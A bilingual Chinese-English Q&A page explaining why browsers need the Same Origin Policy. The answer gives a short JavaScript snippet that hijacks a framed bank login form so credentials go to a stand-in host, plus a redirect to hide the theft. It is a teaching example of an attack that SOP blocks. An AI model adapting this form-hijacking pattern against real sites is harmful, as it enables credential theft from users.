为什么需要同源策略的简单示例 [英] Simple example for why Same Origin Policy is needed

问题描述

我已经阅读了 同源策略，但为了更好地理解这个问题:有人可以写一个简单的代码(用任何语言)来演示 SOP 阻止的攻击吗?

I've read about Same Origin Policy, but for a better understanding of the matter: could anyone please write a simple code (in any language) that will demonstrate an attack that SOP stops?

在 SOP 出现之前怎么可能攻击别人?

How was it possible to attack someone before SOP came about?

推荐答案

<iframe id="bank" src="https://yourbank.com"></iframe>

<script>
    window.onload = function() {
        document.getElementById('bank').contentWindow.document.forms[0].action =
            'http://example.com';
    };
</script>

Javascript 代码更改了表单的操作属性(目的地，顾名思义)，因此当您提交表单时，您将凭据发送给我，而不是您的银行.

The Javascript code changes the form's action property (the destination, in a matter of speaking), so when you submit the form, you send your credentials to me, not your bank.

如果我在我的服务器上设置一个 PHP 脚本将您重定向到您的银行，您甚至不会注意到它.

If I set up a PHP script on my server that redirects you to your bank, you won't even notice it.

使用同源策略，这种攻击是不可能的.我域中的站点无法读取或修改银行网站的内容.

With Same Origin Policy, this attack isn't possible. A site on my domain cannot read or modify the contents of the bank's website.

这篇关于为什么需要同源策略的简单示例的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！